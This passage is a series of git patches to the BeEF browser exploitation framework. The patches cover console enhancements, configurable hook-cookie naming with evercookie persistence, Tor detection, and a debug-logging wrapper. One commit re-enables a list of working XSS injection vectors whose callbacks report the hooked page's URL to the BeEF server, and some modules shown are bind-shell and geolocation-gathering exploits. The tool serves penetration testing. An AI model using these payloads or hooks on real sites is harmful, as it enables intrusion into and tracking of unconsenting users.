   def cmd_commands_help(*args)
     print_status("List command modules for this target")
+    print_line("Usage: commands [options]")
+    print_line
+    print @@commands_opts.usage()
   end
   
   def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
     else
       driver.interface.getcommands.each { |x|
         x['children'].each { |y|
-          if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
             modid = y['id']
           end
         }
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index e122933e5..ff9082626 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -310,7 +310,7 @@ class ShellInterface
         ['Hooked Page', 'Page Title',    'PageTitle'],
         ['Hooked Page', 'Page URI',      'PageURI'],
         ['Hooked Page', 'Page Referrer', 'PageReferrer'],
-        ['Hooked Page', 'Host Name/IP',  'HostName'],
+        ['Hooked Page', 'Hook Host',  'HostName'],
         ['Hooked Page', 'Cookies',       'Cookies'],
 
         # Host
@@ -328,22 +328,22 @@ class ShellInterface
 
       case p[2]
         when "BrowserName"
-          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
 
         when "ScreenSize"
-          screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = screen_size_hash['width']
           height = screen_size_hash['height']
           cdepth = screen_size_hash['colordepth']
           data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
 
         when "WindowSize"
-          window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = window_size_hash['width']
           height = window_size_hash['height']
           data   = "Width: #{width}, Height: #{height}"
         else
-          data   = BD.get(zombie_session, p[2])
+          data   = BD.get(self.targetsession, p[2])
       end
 
       # add property to summary hash

From 5585879cca2de0d9860f07c78c4f6b430c63d9c4 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 9 Apr 2013 10:25:49 +0100
Subject: [PATCH 267/397] Updated multiple core files to use hook_session_name
 consistently from the config.yaml file.

---
 core/main/client/init.js             |  3 ++-
 core/main/client/session.js          | 15 ++++++++-------
 core/main/client/updater.js          |  3 ++-
 core/main/handlers/modules/beefjs.rb |  3 ++-
 4 files changed, 14 insertions(+), 10 deletions(-)

diff --git a/core/main/client/init.js b/core/main/client/init.js
index 992761e48..b18fd262a 100644
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -13,7 +13,8 @@
  * and will have a new session id. The new session id will need to know
  * the brwoser details. So sendback the browser details again.
  */
-BEEFHOOK = beef.session.get_hook_session_id();
+
+beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
     beef.net.browser_details();
diff --git a/core/main/client/session.js b/core/main/client/session.js
index 20ded71cf..303c93cc3 100644
--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -13,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
 	 */
   	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
 	 */
   	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**
diff --git a/core/main/client/updater.js b/core/main/client/updater.js
index 65c5de693..1dad1beb2 100644
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -15,6 +15,7 @@ beef.updater = {
 	
 	// XHR-polling timeout.
     xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 1f434189a..2bb2dfeec 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -80,8 +80,9 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
-            # @note set the hook file path
+            # @note set the hook file path and BeEF's cookie name
             hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
 
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?

From 1721d3c263269f5532a3c0e2aa14f8ff29c4714a Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 13 Apr 2013 14:48:40 +0800
Subject: [PATCH 268/397] Fixes issue #879. Console enhancements.

---
 .../console/lib/command_dispatcher/command.rb | 25 ++++++++++++++++++-
 1 file changed, 24 insertions(+), 1 deletion(-)

diff --git a/extensions/console/lib/command_dispatcher/command.rb b/extensions/console/lib/command_dispatcher/command.rb
index 4c74acbfa..f2db4d5ef 100644
--- a/extensions/console/lib/command_dispatcher/command.rb
+++ b/extensions/console/lib/command_dispatcher/command.rb
@@ -10,9 +10,18 @@ module CommandDispatcher
   
 class Command
   include BeEF::Extension::Console::CommandDispatcher
+
+  @@params = []
   
   def initialize(driver)
     super
+    begin 
+      driver.interface.cmd['Data'].each{|data|
+        @@params << data['name']
+      }
+    rescue
+      return
+    end
   end
   
   def commands
@@ -46,7 +55,11 @@ class Command
     print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
 
     driver.interface.cmd['Data'].each{|data|
-      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      if data['type'].eql?("combobox")
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
+      else
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      end
     } if not driver.interface.cmd['Data'].nil?
   end
   
@@ -80,6 +93,16 @@ class Command
     print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
     print_status("  Usage: param <paramname> <paramvalue>")
   end
+
+  def cmd_param_tabs(str,words)
+    return if words.length > 1
+
+    if @@params == ""
+      #nothing prepopulated?
+    else
+      return @@params
+    end
+  end
   
   def cmd_execute(*args)
     @@bare_opts.parse(args) {|opt, idx, val|

From 950c3d37a74d420c8c35e6825c3073206328f6ac Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 13 Apr 2013 14:51:34 +0800
Subject: [PATCH 269/397] Fixes Issue #880. Detect Tor update - now works

---
 modules/network/detect_tor/command.js | 4 +++-
 modules/network/detect_tor/module.rb  | 1 +
 2 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/modules/network/detect_tor/command.js b/modules/network/detect_tor/command.js
index 4872d2e11..95e89dd97 100644
--- a/modules/network/detect_tor/command.js
+++ b/modules/network/detect_tor/command.js
@@ -14,7 +14,9 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
+	//img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
+	//img.src = 'http://xycpusearchon2mc.onion/deeplogo.jpg'
+	img.src = '<%= @tor_resource %>';
 	img.id = 'torimg';
 	img.setAttribute("attr","start");
 	img.onerror = function() {
diff --git a/modules/network/detect_tor/module.rb b/modules/network/detect_tor/module.rb
index d3cb58ea3..65e7532c0 100644
--- a/modules/network/detect_tor/module.rb
+++ b/modules/network/detect_tor/module.rb
@@ -7,6 +7,7 @@ class Detect_tor < BeEF::Core::Command
   
   def self.options
     return [
+    	{'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'},
         {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
     ]
   end

From 55b0bee9ca3477ac1cca520d854fd8be93ca8a43 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 14 Apr 2013 20:38:41 +0930
Subject: [PATCH 270/397] Re-enable XSS-Rays vectors containing ' charater

Fix issue #47
---
 core/main/client/net/xssrays.js | 24 +++++++++++-------------
 1 file changed, 11 insertions(+), 13 deletions(-)

diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js
index 1eccb54d5..d6914fe00 100644
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -49,22 +49,20 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
-//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -341,7 +339,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                 beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                 beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                 exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                         form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

From a172362452e54d4b74b2ee08e1e3e176f82b4d2f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 15 Apr 2013 16:49:01 +0930
Subject: [PATCH 271/397] Part of issue #862 - Add `beef.debug()` for
 client-side debugging

Add `beef.debug()` function - wraps `console.log()`

Debug messages are suppressed for browsers which don't support `console.log()`

Update './core/*' to use `beef.debug()` instead of `console.log()`
Update './modules/*' to use `beef.debug()` instead of `console.log()`
Update './extensions/*' to use `beef.debug()` instead of `console.log()`

Add 'modules/debug/test_beef_debug/' module
---
 core/main/client/beef.js                      | 15 +++++++++++++-
 core/main/client/browser.js                   |  4 ++--
 core/main/client/geolocation.js               | 10 +++++-----
 core/main/client/init.js                      |  4 ++--
 core/main/client/net/dns.js                   |  2 +-
 core/main/client/net/xssrays.js               |  2 +-
 .../javascript/ui/panel/tabs/ZombieTabIpec.js | 10 +++++-----
 modules/debug/test_beef_debug/command.js      | 17 ++++++++++++++++
 modules/debug/test_beef_debug/config.yaml     | 16 +++++++++++++++
 modules/debug/test_beef_debug/module.rb       | 20 +++++++++++++++++++
 .../beefbind/beef_bind_shell/command.js       | 12 +++++------
 .../beef_bind_staged_deploy/command.js        | 10 +++++-----
 modules/misc/local_file_theft/command.js      |  8 ++++----
 .../command.js                                |  4 ++--
 .../phonegap/phonegap_geo_locate/command.js   |  2 +-
 .../phonegap/phonegap_persistence/command.js  | 18 ++++++++---------
 .../autocomplete_theft/command.js             |  2 +-
 modules/social_engineering/clippy/command.js  |  2 +-
 18 files changed, 112 insertions(+), 46 deletions(-)
 create mode 100644 modules/debug/test_beef_debug/command.js
 create mode 100644 modules/debug/test_beef_debug/config.yaml
 create mode 100644 modules/debug/test_beef_debug/module.rb

diff --git a/core/main/client/beef.js b/core/main/client/beef.js
index 1bbcc01c9..14f39e2a0 100644
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -31,7 +31,20 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index edded787e..ed83764ca 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -871,10 +871,10 @@ beef.browser = {
             try {
                 // append hook script
                 self.frames[i].document.body.appendChild(script);
-                //console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
+                //beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                //console.log("Hooking frame failed");
+                //beef.debug("Hooking frame failed");
             }
         }
     },
diff --git a/core/main/client/geolocation.js b/core/main/client/geolocation.js
index aa50adaed..3347bdbc2 100644
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -32,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                //beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                //beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        //beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                //beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    //beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:
diff --git a/core/main/client/init.js b/core/main/client/init.js
index b18fd262a..1a7780798 100644
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -32,7 +32,7 @@ window.onpopstate = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
             }
             return false;
         }
@@ -47,7 +47,7 @@ window.onclose = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
             }
             return false;
         }
diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js
index 3da10bf36..7955198c2 100644
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -43,7 +43,7 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			//beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }
diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js
index d6914fe00..85e4eb722 100644
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -105,7 +105,7 @@ beef.net.xssrays = {
     // util function. Print string to the console only if the debug flag is on and the browser is not IE.
     printDebug:function(log) {
         if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
         }
     },
 
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
index bbc7c5f36..1b95fbc97 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
                 id = data.id;
             },
             error: function(){
-                console.log("Error getting module id.");
+                beef.debug("Error getting module id.");
             }
         });
         return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
                     async: false,
                     processData: false,
                     success: function(data){
-                        console.log("data: " + data.command_id);
+                        beef.debug("data: " + data.command_id);
                         result = "Command [" + data.command_id + "] sent successfully";
                     },
                     error: function(){
-                        console.log("Error sending command");
+                        beef.debug("Error sending command");
                         return "Error sending command";
                     }
                 });
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
                         processData: false,
                         success: function(data){
                             $jwterm.each(data, function(i){
-                                console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
+                                beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
                                 results += $jwterm.parseJSON(data[i].data).data;
                             });
 
                         },
                         error: function(){
-                            console.log("Error sending command");
+                            beef.debug("Error sending command");
                             return "Error sending command";
                         }
                     });
diff --git a/modules/debug/test_beef_debug/command.js b/modules/debug/test_beef_debug/command.js
new file mode 100644
index 000000000..4737ae211
--- /dev/null
+++ b/modules/debug/test_beef_debug/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	try {
+		var msg = "<%= @msg.gsub(/"/, '\\"') %>";
+		beef.debug(msg);
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
+	}
+
+});
diff --git a/modules/debug/test_beef_debug/config.yaml b/modules/debug/test_beef_debug/config.yaml
new file mode 100644
index 000000000..f077e3b4f
--- /dev/null
+++ b/modules/debug/test_beef_debug/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_beef_debug:
+            enable: true
+            category: "Debug"
+            name: "Test beef.debug()"
+            description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
+            authors: ["bcoles"]
+            target:
+                 working: ["All"]
+                 not_working: ["IE"]
diff --git a/modules/debug/test_beef_debug/module.rb b/modules/debug/test_beef_debug/module.rb
new file mode 100644
index 000000000..239272875
--- /dev/null
+++ b/modules/debug/test_beef_debug/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_beef_debug < BeEF::Core::Command
+
+  def self.options
+    return [
+          {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
index dbd0df5ca..da6d040f0 100755
--- a/modules/exploits/beefbind/beef_bind_shell/command.js
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -31,15 +31,15 @@ beef.execute(function () {
         xhr.onreadystatechange = function(){
             if(xhr.readyState == 4){
                 var result = strip_output(xhr.responseText);
-                console.log("result.length: " + result.length);
+                beef.debug("result.length: " + result.length);
                 if(result.length != 0){
-                    console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+                    beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
                     beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
                         counter++;
                         setTimeout("get_additional_cmd_results()",500);
                         }
              }else{ // No more command results, ready to send another command.
-                console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+                beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
             }
         };
         xhr.open("GET", uri, false);
@@ -51,9 +51,9 @@ beef.execute(function () {
         xhr = new XMLHttpRequest();
         xhr.onreadystatechange = function(){
             if(xhr.readyState == 4){
-                console.log("get_prompt: Retrieved prompt");
+                beef.debug("get_prompt: Retrieved prompt");
                 var prompt = strip_output(xhr.responseText);
-                console.log(prompt);
+                beef.debug(prompt);
                 beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
 
                 //send command
@@ -68,7 +68,7 @@ beef.execute(function () {
         xhr = new XMLHttpRequest();
         xhr.onreadystatechange = function(){
             var cmd_result = strip_output(xhr.responseText);
-            console.log(cmd_result);
+            beef.debug(cmd_result);
             beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
         };
         xhr.open("POST", uri, false);
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
index c0f65089b..dff727eb9 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
@@ -295,7 +295,7 @@ beef.execute(function () {
 
             // this is required only with WebKit browsers.
             if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
-                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
                 XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
                     function byteValue(x) {
                         return x.charCodeAt(0) & 0xff;
@@ -310,7 +310,7 @@ beef.execute(function () {
             log("send_stager: stager sent.");
             stager_successfull = true;
         }catch(exception){
-            console.log("!!! Exception: " + exception);
+            beef.debug("!!! Exception: " + exception);
             // Check for PortBanning exceptions:
